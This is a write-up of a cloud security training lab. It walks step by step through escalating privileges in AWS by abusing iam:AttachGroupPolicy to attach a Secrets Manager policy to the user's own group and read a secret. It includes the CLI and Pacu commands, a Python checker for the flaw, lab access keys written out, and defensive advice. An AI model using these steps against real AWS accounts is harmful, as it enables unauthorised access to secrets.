AWS Pentesting: IAM Privilege Escalation via iam:AttachGroupPolicy
In this writeup, we will walk through Cybr's IAM AttachGroupPolicy PrivEsc lab, which highlights privilege escalation by abusing the iam:AttachGroupPolicy permission. That permission attaches a specified managed policy to a specified IAM group, so a principal who holds it for a group it belongs to can grant itself whatever the attached policy allows.
The image above shows that our IAM user is “iam-attachgrouppolicy-privesc-1735037359663-SeniorDev”.
The lab states that our main goal is to escalate our permissions so we can read the resources in the Secrets Manager service.
We can run the secretsmanager command below to check whether we currently have that access.
aws secretsmanager list-secrets --profile AttachGroupPolicy
Let's run the aws-enumerator tool as usual, using the commands below. We can get this tool from this link.
./aws-enumerator cred -aws_access_key_id AKIAX6IOGWSM5KEGLGU2 -aws_secret_access_key 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
./aws-enumerator enum -services all -speed slow
./aws-enumerator dump -services sts,iam
Based on the output, our user can call ListUsers, ListPolicies, GetUser, and ListGroups.
Let's check the users.
aws iam list-users --profile AttachGroupPolicy
Let's focus on the roles, groups, and policies associated with our current IAM user, iam-attachgrouppolicy-privesc-1735037359663-SeniorDev.
Run the commands below to check for inline and attached user policies.
aws iam list-user-policies --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
aws iam list-attached-user-policies --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
There is an inline policy named “iam-attachgrouppolicy-privesc-1735037359663-senior-manager”. (An inline policy is embedded directly in the user; it is not a customer managed policy, which would show up under list-attached-user-policies instead.)
Run the get-user-policy IAM command below to view the policy document.
aws iam get-user-policy --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --policy-name iam-attachgrouppolicy-privesc-1735037359663-senior-manager --profile AttachGroupPolicy
The image above shows that we have the iam:AttachGroupPolicy permission, scoped to the iam-attachgrouppolicy-privesc-1735037359663-Developers group.
Let's check our group membership.
The image below shows that our IAM user is also a member of that group. Since we hold iam:AttachGroupPolicy on a group we belong to, we can attach a managed policy to that group and inherit whatever it grants, which escalates our privileges.
aws iam list-groups-for-user --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
Let's run the “list-group-policies” and “get-group-policy” commands to get the details of the group's inline policies. We could also run “list-attached-group-policies” to check the group's attached managed policies, but our user doesn't have permission for that call, as shown by aws-enumerator; you can confirm this manually as well.
aws iam list-group-policies --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --profile AttachGroupPolicy
The output below shows that the group has an inline policy named “iam-attachgrouppolicy-privesc-1735037359663-developers”.
aws iam get-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-name iam-attachgrouppolicy-privesc-1735037359663-developers --profile AttachGroupPolicy
As an option, you may cross-check this privilege escalation vector using Pacu.
run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run iam__privesc_scan
Pacu confirms that we can escalate using AttachGroupPolicy.
Let's now leverage this permission to try adding permissions for different services. The commands below show that we first attempted to attach the arn:aws:iam::aws:policy/AdministratorAccess managed policy, but this was not allowed, which suggests the grant is restricted to particular policy ARNs (a restriction usually expressed with an iam:PolicyARN condition on the statement). Attaching arn:aws:iam::aws:policy/SecretsManagerReadWrite, which grants access to list and read the contents of secrets in Secrets Manager, returned no error. Since attach-group-policy prints nothing on success, the absence of an AccessDenied error is the signal that the command was accepted.
aws iam attach-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile AttachGroupPolicy
aws iam attach-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite --profile AttachGroupPolicy
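The enumeration steps above (get-user-policy plus list-groups-for-user) and the two attach attempts can be reasoned about offline before touching the API. The script below is an added example written for this writeup, not Cybr's lab code and not part of the AWS CLI: it takes a user's policy document and group memberships and reports which groups the user can attach managed policies to, then evaluates whether a given attach-group-policy call would be allowed, including an explicit Deny and an iam:PolicyARN condition. The policy document, account ID, and the SecretsManager* condition are constructed sample data; the lab's real policy is not reproduced on this page, and the condition is only an assumption about why AdministratorAccess was refused while SecretsManagerReadWrite was accepted.

```python
"""Offline check for the iam:AttachGroupPolicy privilege escalation vector.

Added example for the writeup: given the policy attached to a user and the groups
the user belongs to, report self-escalation paths and evaluate attach attempts.
NotAction/NotResource and condition keys other than iam:PolicyARN are not modelled.
"""
import re

ACCOUNT_ID = "123456789012"  # placeholder; the lab account is not shown in the writeup
DEV_GROUP_ARN = f"arn:aws:iam::{ACCOUNT_ID}:group/iam-attachgrouppolicy-privesc-1735037359663-Developers"
OTHER_GROUP_ARN = f"arn:aws:iam::{ACCOUNT_ID}:group/Admins"

# Constructed sample modelled on the inline user policy the writeup describes.
# The iam:PolicyARN condition is an assumption consistent with the observed behaviour
# (AdministratorAccess refused, SecretsManagerReadWrite accepted).
SAMPLE_USER_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:ListUsers", "iam:ListGroups", "iam:ListGroupsForUser", "iam:GetUser",
                    "iam:ListUserPolicies", "iam:GetUserPolicy", "iam:ListAttachedUserPolicies",
                    "iam:ListGroupPolicies", "iam:GetGroupPolicy", "iam:ListPolicies"],
         "Resource": "*"},
        {"Effect": "Allow",
         "Action": "iam:AttachGroupPolicy",
         "Resource": DEV_GROUP_ARN,
         "Condition": {"ArnLike": {"iam:PolicyARN": "arn:aws:iam::aws:policy/SecretsManager*"}}},
    ],
}
SAMPLE_GROUPS_FOR_USER = [DEV_GROUP_ARN]  # constructed list-groups-for-user result

_LIKE_OPS = {"ArnLike", "StringLike"}
_EQUALS_OPS = {"ArnEquals", "StringEquals"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def iam_match(pattern, value, wildcard=True, case_insensitive=False):
    """Match an IAM pattern ('*' = any run, '?' = one char) against a value."""
    flags = re.IGNORECASE if case_insensitive else 0
    if wildcard:
        regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    else:
        regex = re.escape(pattern)
    return re.fullmatch(regex, value, flags) is not None


def _policy_arn_constraints(statement):
    """Return [(patterns, wildcard_ok), ...] constraining iam:PolicyARN, or None if unconstrained."""
    constraints = []
    for op, keys in statement.get("Condition", {}).items():
        for key, patterns in keys.items():
            if key.lower() != "iam:policyarn":
                continue
            if op in _LIKE_OPS:
                constraints.append((_as_list(patterns), True))
            elif op in _EQUALS_OPS:
                constraints.append((_as_list(patterns), False))
            # negated operators (ArnNotLike etc.) are not modelled: treat as unconstrained
    return constraints or None


def _statement_applies(statement, group_arn, policy_arn=None):
    """Does this statement cover iam:AttachGroupPolicy on group_arn (and policy_arn, if given)?"""
    actions = _as_list(statement.get("Action"))
    if not any(iam_match(a, "iam:AttachGroupPolicy", case_insensitive=True) for a in actions):
        return False
    if not any(iam_match(r, group_arn) for r in _as_list(statement.get("Resource"))):
        return False
    constraints = _policy_arn_constraints(statement)
    if policy_arn is None or constraints is None:
        return True
    # Condition blocks are ANDed; the values inside one block are ORed.
    return all(any(iam_match(p, policy_arn, wildcard=wc) for p in pats) for pats, wc in constraints)


def self_escalation_paths(policy, groups_for_user):
    """Groups the user belongs to that an Allow statement lets them attach policies to."""
    paths = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for group_arn in groups_for_user:
            if _statement_applies(stmt, group_arn):
                constraints = _policy_arn_constraints(stmt)
                paths.append({"group_arn": group_arn,
                              "policy_arn_patterns": None if constraints is None
                              else [p for pats, _ in constraints for p in pats]})
    return paths


def can_attach_policy(policy, group_arn, policy_arn):
    """Would `aws iam attach-group-policy` be allowed? Explicit Deny wins, as in IAM."""
    stmts = _as_list(policy.get("Statement"))
    if any(s.get("Effect") == "Deny" and _statement_applies(s, group_arn, policy_arn) for s in stmts):
        return False
    return any(s.get("Effect") == "Allow" and _statement_applies(s, group_arn, policy_arn) for s in stmts)


if __name__ == "__main__":
    for path in self_escalation_paths(SAMPLE_USER_POLICY, SAMPLE_GROUPS_FOR_USER):
        print("can attach policies to own group:", path)
    for arn in ("arn:aws:iam::aws:policy/AdministratorAccess",
                "arn:aws:iam::aws:policy/SecretsManagerReadWrite"):
        print(arn, "->", can_attach_policy(SAMPLE_USER_POLICY, DEV_GROUP_ARN, arn))
```

In practice you would feed it the JSON from `aws iam get-user-policy` (the `PolicyDocument` field) and the `Arn` values from `aws iam list-groups-for-user`; the wildcard handling matters because a grant written as `iam:Attach*` or a resource of `arn:aws:iam::ACCOUNT:group/*` is just as exploitable as the exact names used in this lab.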
Let's confirm that we have escalated our permissions by running the “list-secrets” secretsmanager command again; it should now succeed.
aws secretsmanager list-secrets --profile AttachGroupPolicy
As a final step, retrieve the secret string with the “get-secret-value” command below.
aws secretsmanager get-secret-value --secret-id iam-attachgrouppolicy-privesc-1735037359663-final_flag --profile AttachGroupPolicy
Conclusion:
In this walkthrough, we showed how privilege escalation can be performed by abusing the iam:AttachGroupPolicy permission. We also showed our recon methodology for IAM permissions and covered tools such as aws-enumerator and Pacu. The defensive takeaway is that iam:AttachGroupPolicy (like iam:PutGroupPolicy and iam:AddUserToGroup) should never be granted to a principal for a group it belongs to, and where it must be granted, the allowed policy ARNs should be restricted with an iam:PolicyARN condition so that a broad policy such as AdministratorAccess cannot be attached.
References:
https://cybr.com/hands-on-labs/lab/iam-attachgrouppolicy-privesc/
https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/
https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachGroupPolicy.html